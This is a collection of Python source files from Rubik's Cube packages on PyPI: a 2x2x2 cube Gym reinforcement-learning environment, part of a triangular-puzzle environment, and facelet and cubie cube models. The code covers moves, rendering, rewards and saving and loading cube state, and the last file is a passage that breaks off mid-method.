        self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
                              25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35], dtype=np.uint8)
        if scramble:
            self.algorithm(scramble)
        elif scramble is False:  # was `== False` (PEP 8 E712); identity test is the intended check
            pass
        else:
            self.algorithm(self.generate_scramble())
        self.update_cube_reduced()
        self.update_cube_state()
        return self.cube_state

    def render(self, mode='human', render_time=100):
        """Render the colour string ('ansi'), an RGB array, or a cv2 window ('human')."""
        if mode == 'ansi':
            return self.cube_reduced
        else:
            # TODO: the original `np.zeros(...) * 255` evaluates to zeros; a
            # white canvas (np.full(..., 255, np.uint8)) was probably intended.
            # Kept black to preserve the existing rendered output.
            img = np.zeros((312, 360, 3), np.uint8)
            s = 60
            s_2 = 30
            h = 52
            ctr = 0
            # Draw rows of alternating up/down triangles, one per sticker.
            for row in range(6):
                pt1 = row * s_2, row * h
                inverse = 1
                for tile in range(11 - 2 * row):
                    pt2 = pt1[0] + s, pt1[1]
                    pt3 = pt1[0] + s_2, pt1[1] + inverse * h
                    triangle_cnt = np.array([pt1, pt2, pt3])
                    cv2.drawContours(img, [triangle_cnt], 0, COLOR_MAP[TILE_MAP[self.cube[ctr]]], -1)
                    pt1 = pt1[0] + s_2, pt1[1] + inverse * h
                    inverse *= -1
                    ctr += 1
            if mode == 'rgb_array':
                return img
            elif mode == "human":
                img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                cv2.imshow("Cube", img)
                cv2.waitKey(render_time)

    def close(self):
        """Free the large state table and any open cv2 windows."""
        del self.cube_states
        gc.collect()
        cv2.destroyAllWindows()
# Maps each of the 36 sticker ids to its colour letter, laid out in the
# flattened triangle-strip order used by render().
TILE_MAP = {
    0: 'R', 1: 'R', 2: 'R', 3: 'R', 4: 'R',
    5: 'G',
    6: 'B', 7: 'B', 8: 'B', 9: 'B', 10: 'B',
    11: 'R', 12: 'R', 13: 'R',
    14: 'G', 15: 'G', 16: 'G',
    17: 'B', 18: 'B', 19: 'B',
    20: 'R',
    21: 'G', 22: 'G', 23: 'G', 24: 'G', 25: 'G',
    26: 'B',
    27: 'Y', 28: 'Y', 29: 'Y', 30: 'Y', 31: 'Y',
    32: 'Y', 33: 'Y', 34: 'Y',
    35: 'Y'
}

# RGB tuple used when rendering each colour letter.
COLOR_MAP = {
    'G': (0, 128, 0),
    'R': (255, 0, 0),
    'B': (0, 0, 255),
    'Y': (255, 255, 0)
}

# Discrete action id -> (layer, turn type); None means clockwise.
ACTION_MAP = {0: ("L", None), 1: ("R", None), 2: ("U", None), 3: ("B", None)}
import pickle
import random
import gym
from gym import spaces
import os
import cv2
import numpy as np
import gc
import wget
class RubiksCube222Env(gym.Env):
    """OpenAI Gym environment for the 2x2x2 Rubik's Cube.

    The cube is stored as a permutation of 24 sticker indices
    (``self.cube``, np.uint8).  A pickled lookup table (downloaded on first
    use) maps each 24-character colour string to a compact integer state id,
    which is the observation returned to the agent.  Actions are clockwise
    quarter turns of the F, R and U faces only (see ``ACTION_MAP``).
    """
    metadata = {'render.modes': ['human', 'rgb_array', 'ansi']}
    def __init__(self):
        self.cube = None  # np.uint8 permutation of sticker indices 0..23
        self.cube_reduced = None  # 24-char colour string (W/O/G/R/B/Y letters)
        self.cube_state = None  # integer state id looked up in self.cube_states
        # spaces
        self.action_space = spaces.Discrete(3)  # 0:F, 1:R, 2:U (ACTION_MAP)
        # 3674160 states -- presumably the count of reachable 2x2x2 positions
        # under F/R/U turns with one corner fixed; TODO confirm against the
        # pickled state table.
        self.observation_space = spaces.Discrete(3674160)
        state_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "rubiks_cube_222_states_FRU.pickle")
        if not os.path.exists(state_file):
            print("State file not found")
            print("Downloading...")
            wget.download("https://storage.googleapis.com/rubiks_cube_gym/rubiks_cube_222_states_FRU.pickle", state_file)
            print("Download complete")
        with open(state_file, "rb") as f:
            self.cube_states = pickle.load(f)
    def update_cube_reduced(self):
        """Recompute the colour-string representation from the sticker permutation."""
        self.cube_reduced = ''.join(TILE_MAP[tile] for tile in self.cube)
    def update_cube_state(self):
        """Recompute the integer state id from the colour string."""
        self.cube_state = self.cube_states[self.cube_reduced]
    def generate_scramble(self):
        """Return a random 11-move scramble over F/R/U with '', '2', "'" suffixes.

        Two consecutive moves never turn the same face.
        """
        scramble_len = 0
        prev_move = None
        scramble = ""
        moves = ['F', 'R', 'U']
        move_type = ['', '2', "'"]
        while scramble_len < 11:
            move = random.choice(moves)
            while move == prev_move:
                move = random.choice(moves)
            scramble += move + random.choice(move_type) + " "
            prev_move = move
            scramble_len += 1
        return scramble[:-1]  # drop trailing space
    def move(self, move_side, move_type=None):
        """Apply a single face turn to ``self.cube`` in place.

        :param move_side: one of "R", "L", "F", "B", "U", "D".
        :param move_type: None for one clockwise quarter turn, "2" for a
            half turn, "'" for a counterclockwise turn (three quarters).
        """
        # Number of clockwise quarter turns to apply.
        repetitions = dict({None: 1, "2": 2, "'": 3})[move_type]
        # side_cubies_old: the ring of 8 stickers bordering the turning face;
        # face_cubies_old: the face's own 2x2 sticker block.
        if move_side == "R":
            side_cubies_old = np.array([1, 3, 7, 15, 21, 23, 18, 10])
            face_cubies_old = np.array([[8, 9], [16, 17]])
        elif move_side == "L":
            side_cubies_old = np.array([2, 0, 11, 19, 22, 20, 14, 6])
            face_cubies_old = np.array([[4, 5], [12, 13]])
        elif move_side == "F":
            side_cubies_old = np.array([2, 3, 13, 5, 21, 20, 8, 16])
            face_cubies_old = np.array([[6, 7], [14, 15]])
        elif move_side == "B":
            side_cubies_old = np.array([0, 1, 9, 17, 23, 22, 12, 4])
            face_cubies_old = np.array([[10, 11], [18, 19]])
        elif move_side == "U":
            side_cubies_old = np.array([6, 7, 8, 9, 10, 11, 4, 5])
            face_cubies_old = np.array([[0, 1], [2, 3]])
        elif move_side == "D":
            side_cubies_old = np.array([14, 15, 12, 13, 18, 19, 16, 17])
            face_cubies_old = np.array([[20, 21], [22, 23]])
        # Each quarter turn cycles the ring by 2 stickers and rotates the
        # 2x2 face block by 90 degrees.
        side_cubies_new = np.roll(side_cubies_old, -2 * repetitions)
        face_cubies_new = np.rot90(face_cubies_old, 4 - repetitions).flatten()
        face_cubies_old = face_cubies_old.flatten()
        np.put(self.cube, side_cubies_old, self.cube[side_cubies_new])
        np.put(self.cube, face_cubies_old, self.cube[face_cubies_new])
    def algorithm(self, moves):
        """Apply a whitespace-separated move sequence, e.g. ``"F R2 U'"``."""
        for move in moves.split(" "):
            if len(move) == 2:
                self.move(move[0], move[1])
            else:
                self.move(move[0])
    def step(self, action):
        """Standard gym step: apply ``ACTION_MAP[action]`` and return
        ``(observation, reward, done, info)``."""
        move = ACTION_MAP[action]
        self.move(move[0], move[1])
        self.update_cube_reduced()
        self.update_cube_state()
        reward, done = self.reward()
        observation = self.cube_state
        info = {"cube": self.cube, "cube_reduced": self.cube_reduced}
        return observation, reward, done, info
    def reward(self):
        """Return ``(reward, done)``: +100/True when solved, else -1/False."""
        if self.cube_reduced == "WWWWOOGGRRBBOOGGRRBBYYYY":
            return 100, True
        else:
            return -1, False
    def reset(self, scramble=None):
        """Reset to the solved cube, then scramble.

        :param scramble: a scramble string to apply; ``False`` to skip
            scrambling entirely; ``None`` (default) for a random scramble.
        :return: the integer state id of the resulting cube.
        """
        self.cube = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
                             dtype=np.uint8)
        if scramble:
            self.algorithm(scramble)
        # NOTE(review): `scramble == False` uses equality, so 0 also matches
        # this branch while "" falls through to a random scramble -- confirm
        # that is intended.
        elif scramble == False:
            pass
        else:
            self.algorithm(self.generate_scramble())
        self.update_cube_reduced()
        self.update_cube_state()
        return self.cube_state
    def render(self, mode='human', render_time=100):
        """Render the cube.

        :param mode: 'ansi' returns the colour string, 'rgb_array' returns a
            6x8x3 uint8 array of the unfolded cube, 'human' shows it with
            OpenCV for ``render_time`` ms.
        """
        if mode == 'ansi':
            return self.cube_reduced
        else:
            # Mask of the unfolded-cube layout: 1 marks a sticker cell.
            cube_to_render = [[0] * 2 + [1] * 2 + [0] * 4] * 2 + [[1] * 8] * 2 + [[0] * 2 + [1] * 2 + [0] * 4] * 2
            render_array = np.zeros((6, 8, 3), dtype=np.uint8)
            ctr = 0
            for row in range(6):
                for col in range(8):
                    if cube_to_render[row][col] == 1:
                        render_array[row][col] = COLOR_MAP[TILE_MAP[self.cube[ctr]]]
                        ctr += 1
            if mode == 'rgb_array':
                return render_array
            elif mode == "human":
                img = cv2.cvtColor(render_array, cv2.COLOR_BGR2RGB)
                img = cv2.resize(img, (300, 225), interpolation=cv2.INTER_NEAREST)
                cv2.imshow("Cube", np.array(img))
                cv2.waitKey(render_time)
    def close(self):
        """Release resources: drop the state table and close OpenCV windows."""
        del self.cube_states
        gc.collect()
        cv2.destroyAllWindows()
# Sticker index (0..23) -> face-colour letter of the solved 2x2x2 cube:
# 0-3 = Up (W), 4-19 = the four side faces in O/G/R/B pairs, 20-23 = Down (Y).
TILE_MAP = {
    0: 'W', 1: 'W', 2: 'W', 3: 'W',
    4: 'O', 5: 'O', 6: 'G', 7: 'G', 8: 'R', 9: 'R', 10: 'B', 11: 'B',
    12: 'O', 13: 'O', 14: 'G', 15: 'G', 16: 'R', 17: 'R', 18: 'B', 19: 'B',
    20: 'Y', 21: 'Y', 22: 'Y', 23: 'Y'
}
# Colour letter -> colour triple used by render().
# NOTE(review): render() converts the array with COLOR_BGR2RGB before
# display, so confirm whether these are intended as RGB or BGR.
COLOR_MAP = {
    'W': (255, 255, 255),
    'O': (255, 165, 0),
    'G': (0, 128, 0),
    'R': (255, 0, 0),
    'B': (0, 0, 255),
    'Y': (255, 255, 0)
}
ACTION_MAP = {0: ("F", None), 1: ("R", None), 2: ("U", None)} | /rubiks_cube_gym-0.4.0.tar.gz/rubiks_cube_gym-0.4.0/rubiks_cube_gym/envs/rubiks_cube_222.py | 0.497559 | 0.221372 | rubiks_cube_222.py | pypi |
import numpy as np
from utils import matrix_ref, pieces_ref, bin_to_color
from rubiks_cube.face_cube import FaceCube
from rubiks_cube.cubie_cube import CubieCube
class Cube:
    """
    Implements a 3x3x3 Rubiks Cube.

    Keeps two synchronized sub-models: a facelet-level ``FaceCube``
    (sticker colours) and a piece-level ``CubieCube`` (piece ids and
    orientations).  Every mutation is applied to both.
    """
    def __init__(self):
        """Create a solved cube with both sub-models in their reference state."""
        self.face_cube = FaceCube()
        self.cubie_cube = CubieCube()
    def turn_face(self, face, way=0):
        """
        Makes a turn on the cube.
        :param face: Face to turn (Should be one of [U, R, B, D, F, L]).
        :param way: 0 to clockwise turn, 1 to counterclockwise turn, 2 to double turn.
        :return: No return, the cube gets turned inplace.
        """
        self.face_cube.turn_face(face, way)
        self.cubie_cube.turn_face(face, way)
    def is_solved(self):
        """
        Checks if cube is solved.
        :return: True for solved and False for not solved.
        """
        return self.face_cube.is_solved()
    def n_colors_in_place(self):
        """
        Counts how many colors are in the correct place.
        :return: Number of colors in the correct place.
        """
        return self.face_cube.n_colors_in_place()
    def n_pieces_in_place(self):
        """
        Counts how many pieces are in the correct place.
        :return: Number of pieces in the correct place.
        """
        return self.cubie_cube.n_pieces_in_place()
    def print(self):
        """
        Prints the state of the rubiks cube.
        :return: None.
        """
        self.face_cube.print()
    def scramble(self, scramble):
        """
        Scrambles the cube.
        :param scramble: String in official scramble notation.
        :return: None, the cube scrambles inplace.
        """
        if scramble is not None and not scramble == "":
            self.face_cube.scramble(scramble)
            self.cubie_cube.scramble(scramble)
    def get_color_matrix(self):
        """
        Returns color matrix.
        :return: Color Matrix
        """
        return self.face_cube.get_color_matrix()
    def set_cube(self, setter):
        """
        Set both sub-models from *setter*.

        Accepts either a ``(color_matrix, pieces)`` tuple, or a single
        ndarray shaped like ``matrix_ref`` (facelet colours) or
        ``pieces_ref`` (cubie pieces); the missing representation is then
        derived from the one given.  Unknown formats are reported and
        ignored (no exception is raised).
        """
        if type(setter) is tuple:
            self.face_cube.set_color_matrix(setter[0])
            self.cubie_cube.set_pieces(setter[1])
        elif isinstance(setter, np.ndarray):
            if setter.shape == matrix_ref.shape:
                self.face_cube.set_color_matrix(setter)
                self.cubie_cube.set_pieces_from_matrix(setter)
            elif setter.shape == pieces_ref.shape:
                self.face_cube.set_matrix_from_pieces(setter)
                self.cubie_cube.set_pieces(setter)
            else:
                print("Error: Format to set cube unknown")
        else:
            print("Error: Format to set cube unknown")
    def get_pieces(self):
        """
        Returns pieces.
        :return: Pieces
        """
        return self.cubie_cube.get_pieces()
    def get_binary_array(self, one_hot=False):
        """
        Returns the color matrix as a binary array for whatever purpose you`d like.
        :param one_hot: True if you want it to be onehot encoded.
        :return: Binary color matrix.
        """
        return self.face_cube.get_binary_array(one_hot)
    def get_corners_orientation(self):
        """Return the orientation column (0/1/2) of the eight corner pieces."""
        return self.cubie_cube.get_corners_orientation()
    def get_edges_orientation(self):
        """Return the orientation column (0/1) of the twelve edge pieces."""
        return self.cubie_cube.get_edges_orientation()
    def save_cube(self, path):
        """
        Serialize the cube to *path* as a packed little-endian bit string
        of the 144-bit binary colour encoding (written as 32 bytes).
        """
        # NOTE(review): the file handle is never closed; consider a with-block.
        file = open(path, "wb")
        bin_to_save = "".join(self.get_binary_array().astype(str))
        bin_to_save = bin_to_save  # NOTE(review): redundant self-assignment
        # Reverse so bit i of the array becomes bit i of the integer, then
        # pack into 32 little-endian bytes.
        bin_to_save = int(bin_to_save[::-1], base=2).to_bytes(32, "little")
        file.write(bin_to_save)
    def load_cube(self, path):
        """
        Rebuild the cube from a file written by :meth:`save_cube`.
        """
        # NOTE(review): the file handle is never closed; consider a with-block.
        file = open(path, "rb")
        binary_array = file.read()
        # Unpack the little-endian bytes back into the 144-bit string
        # (zero-padded to 144), then split into 48 3-bit colour codes.
        binary_array = np.array(list("{:0<144}".format(format(int.from_bytes(binary_array, "little"), "032b")[::-1])))
        binary_array = binary_array.reshape(-1, 3).astype(int)
        load_matrix = matrix_ref.copy()
        for i in range(6):
            for j in range(1, 9):
                load_matrix[i][j] = bin_to_color[tuple(binary_array[i*8+(j-1)])]
self.set_cube(load_matrix) | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/rubiks_cube.py | 0.764804 | 0.374362 | rubiks_cube.py | pypi |
import numpy as np
from utils import matrix_ref, int_face, notation, swap4, colors, corners
class FaceCube:
    """Facelet-level model of the 3x3x3 cube: 6 faces of 9 coloured stickers.

    ``color_matrix`` is indexed ``[face, facelet]`` where facelet 0 is the
    face centre, 1-4 are the edge facelets and 5-8 the corner facelets
    (this layout is visible in ``turn_face`` and ``print``).
    """
    def __init__(self):
        self.color_matrix = matrix_ref.copy()
    def swap(self, to_swap, way):
        """4-cycle the facelets addressed by the four (face, index) pairs in
        ``to_swap``; ``way`` selects the cycle step (delegated to ``swap4``)."""
        (self.color_matrix[to_swap[0]], self.color_matrix[to_swap[1]],
         self.color_matrix[to_swap[2]], self.color_matrix[to_swap[3]]) = \
            swap4(self.color_matrix[to_swap[0]].copy(), self.color_matrix[to_swap[1]].copy(),
                  self.color_matrix[to_swap[2]].copy(), self.color_matrix[to_swap[3]].copy(),
                  way)
    def turn_face(self, face, way=0):
        """Apply one face turn at sticker level.

        :param face: face letter, translated to an int via ``int_face``.
        :param way: 0 clockwise, 1 counterclockwise, 2 double turn
            (package convention; see ``Cube.turn_face``).
        """
        turn = int_face[face]
        # Turn edge facelets in the turning face
        self.swap([(turn, 1), (turn, 2), (turn, 3), (turn, 4)], way)
        self.swap([(turn, 5), (turn, 6), (turn, 7), (turn, 8)], way)
        # Each branch lists the lateral facelets moved by this face, as
        # (face, facelet) pairs in cycle order.
        # UP
        if turn == 0:
            lateral_edges_to_swap = [(1, 3), (2, 4), (4, 1), (5, 2)]
            lateral_corners_to_swap_1 = [(1, 7), (2, 8), (4, 5), (5, 6)]
            lateral_corners_to_swap_2 = [(1, 8), (2, 5), (4, 6), (5, 7)]
        # FRONT
        elif turn == 1:
            lateral_edges_to_swap = [(3, 1), (2, 1), (0, 1), (5, 1)]
            lateral_corners_to_swap_1 = [(3, 5), (2, 5), (0, 5), (5, 5)]
            lateral_corners_to_swap_2 = [(3, 6), (2, 6), (0, 6), (5, 6)]
        # RIGHT
        elif turn == 2:
            lateral_edges_to_swap = [(0, 2), (1, 2), (3, 4), (4, 2)]
            lateral_corners_to_swap_1 = [(0, 6), (1, 6), (3, 8), (4, 6)]
            lateral_corners_to_swap_2 = [(0, 7), (1, 7), (3, 5), (4, 7)]
        # DOWN
        elif turn == 3:
            lateral_edges_to_swap = [(1, 1), (5, 4), (4, 3), (2, 2)]
            lateral_corners_to_swap_1 = [(5, 8), (4, 7), (2, 6), (1, 5)]
            lateral_corners_to_swap_2 = [(5, 5), (4, 8), (2, 7), (1, 6)]
        # BACK
        elif turn == 4:
            lateral_edges_to_swap = [(0, 3), (2, 3), (3, 3), (5, 3)]
            lateral_corners_to_swap_1 = [(0, 8), (2, 8), (3, 8), (5, 8)]
            lateral_corners_to_swap_2 = [(0, 7), (2, 7), (3, 7), (5, 7)]
        # LEFT
        elif turn == 5:
            lateral_edges_to_swap = [(0, 4), (4, 4), (3, 2), (1, 4)]
            lateral_corners_to_swap_1 = [(1, 8), (0, 8), (4, 8), (3, 6)]
            lateral_corners_to_swap_2 = [(1, 5), (0, 5), (4, 5), (3, 7)]
        else:
            print("Error: Invalid face to turn")
            return
        # Turn edge facelets in the lateral faces
        self.swap(lateral_edges_to_swap, way)
        # Turn corner facelets in the lateral faces part 1
        self.swap(lateral_corners_to_swap_1, way)
        # Turn corner facelets in the lateral faces part 2
        self.swap(lateral_corners_to_swap_2, way)
    def is_solved(self):
        """Return True when every sticker matches the reference matrix."""
        return np.array_equal(self.color_matrix, matrix_ref)
    def n_colors_in_place(self):
        """Return the number of stickers matching the reference matrix."""
        return np.sum(self.color_matrix == matrix_ref)
    def print(self):
        """Print the unfolded cube as a text diagram."""
        print("rubiks_cube: \n")
        print(" {0} {1} {2}".format(self.color_matrix[4, 8], self.color_matrix[4, 3], self.color_matrix[4, 7]))
        print(" {0} {1} {2}".format(self.color_matrix[4, 4], self.color_matrix[4, 0], self.color_matrix[4, 2]))
        print(" {0} {1} {2}".format(self.color_matrix[4, 5], self.color_matrix[4, 1], self.color_matrix[4, 6]))
        print(" -----")
        print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
              .format(self.color_matrix[5, 8], self.color_matrix[5, 3], self.color_matrix[5, 7],
                      self.color_matrix[0, 8], self.color_matrix[0, 3], self.color_matrix[0, 7],
                      self.color_matrix[2, 8], self.color_matrix[2, 3], self.color_matrix[2, 7],
                      self.color_matrix[3, 8], self.color_matrix[3, 3], self.color_matrix[3, 7]))
        print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
              .format(self.color_matrix[5, 4], self.color_matrix[5, 0], self.color_matrix[5, 2],
                      self.color_matrix[0, 4], self.color_matrix[0, 0], self.color_matrix[0, 2],
                      self.color_matrix[2, 4], self.color_matrix[2, 0], self.color_matrix[2, 2],
                      self.color_matrix[3, 4], self.color_matrix[3, 0], self.color_matrix[3, 2]))
        print("{0} {1} {2}|{3} {4} {5}|{6} {7} {8}|{9} {10} {11}"
              .format(self.color_matrix[5, 5], self.color_matrix[5, 1], self.color_matrix[5, 6],
                      self.color_matrix[0, 5], self.color_matrix[0, 1], self.color_matrix[0, 6],
                      self.color_matrix[2, 5], self.color_matrix[2, 1], self.color_matrix[2, 6],
                      self.color_matrix[3, 5], self.color_matrix[3, 1], self.color_matrix[3, 6]))
        print(" -----")
        print(" {0} {1} {2}".format(self.color_matrix[1, 8], self.color_matrix[1, 3], self.color_matrix[1, 7]))
        print(" {0} {1} {2}".format(self.color_matrix[1, 4], self.color_matrix[1, 0], self.color_matrix[1, 2]))
        print(" {0} {1} {2}".format(self.color_matrix[1, 5], self.color_matrix[1, 1], self.color_matrix[1, 6]))
        print()
    def scramble(self, scramble):
        """Apply a whitespace-separated scramble string (parsed via ``notation``)."""
        turns = [notation[turn] for turn in scramble.split()]
        for turn in turns:
            self.turn_face(turn[0], turn[1])
    def assert_valid_matrix(self):
        """Report (via print) if the matrix has unknown colours or a colour
        count other than 9 per face; does not raise."""
        count_colors = {"color_U": 0, "color_F": 0, "color_R": 0, "color_D": 0, "color_B": 0, "color_L": 0}
        for face in self.color_matrix:
            for facelet in face:
                if facelet not in colors:
                    print("Invalid Matrix")
                    return
                elif facelet == colors[0]:
                    count_colors["color_U"] += 1
                elif facelet == colors[1]:
                    count_colors["color_F"] += 1
                elif facelet == colors[2]:
                    count_colors["color_R"] += 1
                elif facelet == colors[3]:
                    count_colors["color_D"] += 1
                elif facelet == colors[4]:
                    count_colors["color_B"] += 1
                elif facelet == colors[5]:
                    count_colors["color_L"] += 1
        for counted in count_colors.values():
            if counted != 9:
                print("Invalid Matrix")
                return
    def get_color_matrix(self):
        """Return the raw 6x9 colour matrix (not a copy)."""
        return self.color_matrix
    def set_color_matrix(self, matrix):
        """Replace the colour matrix (no validation is performed)."""
        self.color_matrix = matrix
    def get_binary_array(self, one_hot=False):
        """Encode the 48 non-centre facelets as a flat binary array.

        With ``one_hot`` each facelet becomes 6 bits (one per colour,
        288 bits total); otherwise each facelet becomes a 3-bit colour
        code (colors[0] encodes as 000, 144 bits total).
        """
        if one_hot:
            binary_array = np.zeros(288).astype(int)
            for i in range(6):
                for j in range(1, 9):
                    if self.color_matrix[i][j] == colors[0]:
                        binary_array[(j - 1) * 6 + i * 48] = 1
                    elif self.color_matrix[i][j] == colors[1]:
                        binary_array[(j - 1) * 6 + 1 + i * 48] = 1
                    elif self.color_matrix[i][j] == colors[2]:
                        binary_array[(j - 1) * 6 + 2 + i * 48] = 1
                    elif self.color_matrix[i][j] == colors[3]:
                        binary_array[(j - 1) * 6 + 3 + i * 48] = 1
                    elif self.color_matrix[i][j] == colors[4]:
                        binary_array[(j - 1) * 6 + 4 + i * 48] = 1
                    elif self.color_matrix[i][j] == colors[5]:
                        binary_array[(j - 1) * 6 + 5 + i * 48] = 1
        else:
            binary_array = np.zeros(144).astype(int)
            for i in range(6):
                for j in range(1, 9):
                    if self.color_matrix[i][j] == colors[1]:
                        binary_array[(j - 1) * 3 + 1 + i * 24] = 1
                    elif self.color_matrix[i][j] == colors[2]:
                        binary_array[(j - 1) * 3 + 1 + i * 24] = 1
                        binary_array[(j - 1) * 3 + 2 + i * 24] = 1
                    elif self.color_matrix[i][j] == colors[3]:
                        binary_array[(j - 1) * 3 + i * 24] = 1
                    elif self.color_matrix[i][j] == colors[4]:
                        binary_array[(j - 1) * 3 + i * 24] = 1
                        binary_array[(j - 1) * 3 + 2 + i * 24] = 1
                    elif self.color_matrix[i][j] == colors[5]:
                        binary_array[(j - 1) * 3 + i * 24] = 1
                        binary_array[(j - 1) * 3 + 1 + i * 24] = 1
        return binary_array
    def set_corner(self, facelets, piece, position):
        """Write one corner piece's three colours into the given facelets.

        ``piece`` is ``[colour-string, orientation]``; ``position`` is the
        corner slot index.  Corners split into two mirror classes
        (``type1_corners``): placing a piece in a slot of the opposite
        class reverses the facelet order, placing it in the same class
        keeps it -- presumably matching corner chirality; TODO confirm.
        """
        type1_corners = [corners[0], corners[2], corners[5], corners[7]]
        type1_positions = [0, 2, 5, 7]
        if (piece[0] in type1_corners and position in type1_positions) or \
                (piece[0] not in type1_corners and position not in type1_positions):
            if piece[1] == 0:
                self.color_matrix[facelets[0]] = piece[0][0]
                self.color_matrix[facelets[1]] = piece[0][1]
                self.color_matrix[facelets[2]] = piece[0][2]
            elif piece[1] == 1:
                self.color_matrix[facelets[1]] = piece[0][0]
                self.color_matrix[facelets[2]] = piece[0][1]
                self.color_matrix[facelets[0]] = piece[0][2]
            else:
                self.color_matrix[facelets[2]] = piece[0][0]
                self.color_matrix[facelets[0]] = piece[0][1]
                self.color_matrix[facelets[1]] = piece[0][2]
        else:
            if piece[1] == 0:
                self.color_matrix[facelets[0]] = piece[0][0]
                self.color_matrix[facelets[2]] = piece[0][1]
                self.color_matrix[facelets[1]] = piece[0][2]
            elif piece[1] == 1:
                self.color_matrix[facelets[1]] = piece[0][0]
                self.color_matrix[facelets[0]] = piece[0][1]
                self.color_matrix[facelets[2]] = piece[0][2]
            else:
                self.color_matrix[facelets[2]] = piece[0][0]
                self.color_matrix[facelets[1]] = piece[0][1]
                self.color_matrix[facelets[0]] = piece[0][2]
    def set_edge(self, facelets, piece):
        """Write one edge piece's two colours into the given facelets,
        honouring its orientation bit (0 = as stored, 1 = flipped)."""
        if piece[1] == 0:
            self.color_matrix[facelets[0]] = piece[0][0]
            self.color_matrix[facelets[1]] = piece[0][1]
        else:
            self.color_matrix[facelets[0]] = piece[0][1]
            self.color_matrix[facelets[1]] = piece[0][0]
    def set_matrix_from_pieces(self, pieces):
        """Rebuild the whole colour matrix from a cubie-level ``pieces`` array
        (rows 0-11 edges, 12-19 corners)."""
        # Set from edges
        self.set_edge([(0, 1), (1, 3)], pieces[0])  # UF
        self.set_edge([(0, 2), (2, 4)], pieces[1])  # UR
        self.set_edge([(0, 3), (4, 1)], pieces[2])  # UB
        self.set_edge([(0, 4), (5, 2)], pieces[3])  # UL
        self.set_edge([(1, 4), (5, 1)], pieces[4])  # FL
        self.set_edge([(1, 2), (2, 1)], pieces[5])  # FR
        self.set_edge([(4, 2), (2, 3)], pieces[6])  # BR
        self.set_edge([(4, 4), (5, 3)], pieces[7])  # BL
        self.set_edge([(3, 1), (1, 1)], pieces[8])  # DF
        self.set_edge([(3, 4), (2, 2)], pieces[9])  # DR
        self.set_edge([(3, 3), (4, 3)], pieces[10])  # DB
        self.set_edge([(3, 2), (5, 4)], pieces[11])  # DL
        # Set from corners
        self.set_corner([(0, 5), (1, 8), (5, 6)], pieces[12], 0)  # UFL
        self.set_corner([(0, 6), (1, 7), (2, 5)], pieces[13], 1)  # UFR
        self.set_corner([(0, 7), (4, 6), (2, 8)], pieces[14], 2)  # UBR
        self.set_corner([(0, 8), (4, 5), (5, 7)], pieces[15], 3)  # UBL
        self.set_corner([(3, 6), (1, 5), (5, 5)], pieces[16], 4)  # DFL
        self.set_corner([(3, 5), (1, 6), (2, 6)], pieces[17], 5)  # DFR
        self.set_corner([(3, 8), (4, 7), (2, 7)], pieces[18], 6)  # DBR
self.set_corner([(3, 7), (4, 8), (5, 8)], pieces[19], 7) # DBL | /rubiks_cube-1.0.7.tar.gz/rubiks_cube-1.0.7/rubiks_cube/face_cube.py | 0.521959 | 0.633708 | face_cube.py | pypi |
import numpy as np
from utils import pieces_ref, int_face, notation, swap4, colors
class CubieCube:
    """Piece-level (cubie) model of the 3x3x3 cube.

    ``pieces`` is a 20-row array: rows 0-11 are the edge pieces, rows
    12-19 the corner pieces.  Each row is ``[piece, orientation]`` where
    orientation is 0/1 for edges and 0/1/2 for corners (see the
    ``get_*_orientation`` accessors).
    """
    def __init__(self):
        self.pieces = pieces_ref.copy()
    def swap(self, to_swap, way):
        """4-cycle the piece rows at the four indices in ``to_swap``;
        ``way`` selects the cycle step (delegated to ``swap4``)."""
        self.pieces[to_swap[0]], self.pieces[to_swap[1]], self.pieces[to_swap[2]], self.pieces[to_swap[3]] = \
            swap4(self.pieces[to_swap[0]].copy(), self.pieces[to_swap[1]].copy(),
                  self.pieces[to_swap[2]].copy(), self.pieces[to_swap[3]].copy(),
                  way)
    def corner_turn(self, turn, corners_to_swap, way):
        """Twist corner orientations for a quarter turn, then 4-cycle the corners.

        Half turns (``way == 2``) leave orientations untouched.  Each axis
        pair (U/D, F/B, R/L) exchanges a different pair of orientation
        values before the cycle.
        """
        if way != 2:
            for corner in corners_to_swap:
                if turn == 0 or turn == 3:
                    # U or D
                    if self.pieces[corner][1] == 2:
                        self.pieces[corner][1] = 1
                    elif self.pieces[corner][1] == 1:
                        self.pieces[corner][1] = 2
                if turn == 1 or turn == 4:
                    # F or B
                    if self.pieces[corner][1] == 2:
                        self.pieces[corner][1] = 0
                    elif self.pieces[corner][1] == 0:
                        self.pieces[corner][1] = 2
                if turn == 2 or turn == 5:
                    # R or L
                    if self.pieces[corner][1] == 1:
                        self.pieces[corner][1] = 0
                    elif self.pieces[corner][1] == 0:
                        self.pieces[corner][1] = 1
        self.swap(corners_to_swap, way)
    def edges_turn(self, turn, edges_to_swap, way):
        """Flip edge orientations for F/B quarter turns, then 4-cycle the edges."""
        if way != 2:
            for edge in edges_to_swap:
                if turn == 1 or turn == 4:
                    # F or B
                    if self.pieces[edge][1] == 1:
                        self.pieces[edge][1] = 0
                    elif self.pieces[edge][1] == 0:
                        self.pieces[edge][1] = 1
        self.swap(edges_to_swap, way)
    def turn_face(self, face, way=0):
        """
        Makes a turn on the cube.
        :param face: Face to turn (Should be one of [U, R, B, D, F, L]).
        :param way: 0 to clockwise turn, 1 to counterclockwise turn, 2 to double turn.
        :return: No return, the cube gets turned inplace.
        """
        turn = int_face[face]
        # Each branch lists the piece rows moved by this face, in cycle order.
        # UP
        if turn == 0:
            edges_to_swap = [0, 1, 2, 3]
            corners_to_swap = [12, 13, 14, 15]
        # FRONT
        elif turn == 1:
            edges_to_swap = [8, 5, 0, 4]
            corners_to_swap = [16, 17, 13, 12]
        # RIGHT
        elif turn == 2:
            edges_to_swap = [1, 5, 9, 6]
            corners_to_swap = [17, 18, 14, 13]
        # DOWN
        elif turn == 3:
            edges_to_swap = [11, 10, 9, 8]
            corners_to_swap = [19, 18, 17, 16]
        # BACK
        elif turn == 4:
